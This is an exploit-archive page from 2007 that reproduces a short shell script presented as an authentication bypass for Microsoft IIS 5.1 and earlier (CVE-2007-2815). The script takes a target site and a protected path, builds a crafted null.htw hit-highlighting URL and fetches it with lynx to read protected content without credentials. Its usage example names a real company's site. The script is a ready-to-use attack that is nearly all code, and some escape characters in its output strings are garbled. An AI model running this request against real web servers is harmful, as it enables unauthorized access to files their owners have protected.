Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit
# Published : 2007-05-31
# Author : Sha0
# Previous Title : IE6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit
# Next Title : Zenturi ProgramChecker ActiveX File Download/Overwrite Exploit

#!/bin/sh
#
# NTLM && BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: http://www.securityfocus.com/bid/24105/info   (CVE-2007-2815)

if [ $# != 2 ]
then
        printf "USAGE:tt$0 <Site> <Protected Object>nExample:t$0 http://www.microsoft.com  /en/us/default.aspxnn";
        exit 0
fi

site=$1
protectedObject=$2
evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&CiRestriction=b&CiHiliteType=full'
lynx -dump $evil

# www.Syue.com [2007-05-31]